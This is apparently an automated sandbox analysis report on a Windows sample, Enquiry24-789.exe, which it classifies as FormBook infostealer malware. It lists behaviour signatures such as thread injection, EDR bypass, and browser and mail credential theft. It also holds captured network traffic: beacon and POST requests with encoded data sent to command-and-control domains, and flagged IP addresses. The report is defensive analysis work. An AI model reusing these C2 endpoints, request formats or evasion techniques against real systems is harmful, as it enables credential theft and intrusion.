Windows Analysis Report
Enquiry24-789.exe

Overview

General Information

Sample name: Enquiry24-789.exe
Analysis ID: 1486291
MD5: abfddc4a2efc5df57ea9d3915a6f3dba
SHA1: f674f09ae8c7032e567b0aaad73f14012b37948f
SHA256: c90b07c5a8fc34bd981b78834dcf6822f48c81db37d3c4e078dbd77e64d6d03b
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Enquiry24-789.exe ReversingLabs: Detection: 44%
Yara detected FormBook
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3272504977.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3273598788.00000000010D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2482519007.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481598921.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2481123443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3274021338.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Enquiry24-789.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Enquiry24-789.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: sdchange.pdbGCTL source: svchost.exe, 00000002.00000003.2446693880.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446571573.000000000321B000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000003.2581472565.00000000007CB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FNvzpsCDjtsg.exe, 00000004.00000002.3273453544.0000000000D2E000.00000002.00000001.01000000.00000005.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3273224995.0000000000D2E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: Enquiry24-789.exe, 00000000.00000003.2039029012.0000000004040000.00000004.00001000.00020000.00000000.sdmp, Enquiry24-789.exe, 00000000.00000003.2039230118.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2249246087.0000000005000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.000000000559E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.0000000005400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258256121.0000000005200000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.0000000004640000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2486058384.00000000042D0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.00000000047DE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2498182919.000000000448C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Enquiry24-789.exe, 00000000.00000003.2039029012.0000000004040000.00000004.00001000.00020000.00000000.sdmp, Enquiry24-789.exe, 00000000.00000003.2039230118.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2249246087.0000000005000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.000000000559E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2481674156.0000000005400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258256121.0000000005200000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000005.00000002.3274369263.0000000004640000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2486058384.00000000042D0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3274369263.00000000047DE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000005.00000003.2498182919.000000000448C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: sdchange.exe, 00000005.00000002.3274878431.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274520799.000000000315C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2954922095.000000001170C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: sdchange.exe, 00000005.00000002.3274878431.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3272888173.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274520799.000000000315C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2954922095.000000001170C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: sdchange.pdb source: svchost.exe, 00000002.00000003.2446693880.0000000003224000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446571573.000000000321B000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000003.2581472565.00000000007CB000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C3DBBE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C0C2A2 FindFirstFileExW, 0_2_00C0C2A2
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C468EE FindFirstFileW,FindClose, 0_2_00C468EE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00C4698F
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C3D076
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C3D3A9
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C49642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C49642
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C4979D
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C49B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00C49B2B
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C45C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00C45C97
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0255C3F0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0255C3F0
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4x nop then xor eax, eax 5_2_02549C60
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4x nop then pop edi 5_2_0254E060
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4x nop then pop edi 5_2_0254E02E
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4x nop then pop edi 5_2_0256250E
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 4x nop then mov ebx, 00000004h 5_2_045204E8
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.110.124.133 195.110.124.133
Source: Joe Sandbox View IP Address: 85.159.66.93 85.159.66.93
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4CE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 0_2_00C4CE44
Source: global traffic HTTP traffic detected: GET /ylqc/?UVlTmRqX=AIQenQVDJquvL6CtOttF+rAVEsK4B/9dMyVncsTuYD+LzDwt76VT23ot9Accg6DLScK9AXzr2Nn7uFwrhbH/mmP9iiPkm6E+u9eqnOj9VLHaoNNAK1eH6jHrEJ2Cg0Z1jw==&TLK01=EF3pc2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dressroza.comConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
Source: global traffic HTTP traffic detected: GET /7jx3/?UVlTmRqX=+ZJdQBUjgznkAaTTT3SjyJP/zh+/jdRgdsYgjgQhEU+FM1ZsFkM6/delRywd8pmg9PnOVEnqV6AkYRdeiGJOBd6cD9VKa4nHXqnB4M+5ykQI5xbgCxtTjetQx9crTGFA+g==&TLK01=EF3pc2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.udexo.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
Source: global traffic HTTP traffic detected: GET /xn9u/?UVlTmRqX=q8LzHox7RKtGG/WH6JXrmw9pXNpRdFEjHUHiLytE9RGxs1ZcrBZWnD7zumm7JdwcoayhhaK8FSh+TemNQ2QWneapzb32QtJY487IrOyf2rTmigHB/KHNG0HIAnjyt24TlA==&TLK01=EF3pc2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.hongsuilai6.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.dressroza.com
Source: global traffic DNS traffic detected: DNS query: www.udexo.net
Source: global traffic DNS traffic detected: DNS query: www.hongsuilai6.shop
Source: global traffic DNS traffic detected: DNS query: www.emme4.online
Source: unknown HTTP traffic detected: POST /7jx3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.udexo.netOrigin: http://www.udexo.netCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209Referer: http://www.udexo.net/7jx3/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36Data Raw: 55 56 6c 54 6d 52 71 58 3d 7a 62 68 39 54 31 38 44 6f 54 76 66 46 4c 33 48 46 45 79 38 38 4b 57 76 37 53 61 65 73 39 51 49 56 62 38 2b 38 77 73 45 57 53 76 6e 43 6d 31 5a 41 33 77 58 39 4a 53 70 62 51 34 79 77 59 32 41 39 74 66 47 65 32 44 35 4c 39 68 6b 66 79 6c 43 67 57 5a 70 46 38 4c 38 49 35 42 4e 45 64 47 66 58 39 79 6e 6f 72 2b 67 32 79 63 66 35 79 57 64 4d 43 77 69 7a 38 68 44 32 50 45 4e 54 45 67 73 6a 56 73 44 7a 4c 6f 32 35 53 46 4e 38 36 34 47 57 75 6b 63 4d 4a 42 6d 6b 53 67 36 53 46 6b 73 59 36 64 39 76 64 50 41 48 64 62 39 52 55 58 38 7a 32 7a 6d 41 36 5a 61 5a 44 65 7a 47 67 66 75 52 52 52 50 78 63 6f 3d Data Ascii: UVlTmRqX=zbh9T18DoTvfFL3HFEy88KWv7Saes9QIVb8+8wsEWSvnCm1ZA3wX9JSpbQ4ywY2A9tfGe2D5L9hkfylCgWZpF8L8I5BNEdGfX9ynor+g2ycf5yWdMCwiz8hD2PENTEgsjVsDzLo25SFN864GWukcMJBmkSg6SFksY6d9vdPAHdb9RUX8z2zmA6ZaZDezGgfuRRRPxco=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 01 Aug 2024 20:23:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-01T20:23:17.7627179Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 01 Aug 2024 20:23:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 01 Aug 2024 20:23:50 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 01 Aug 2024 20:23:53 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
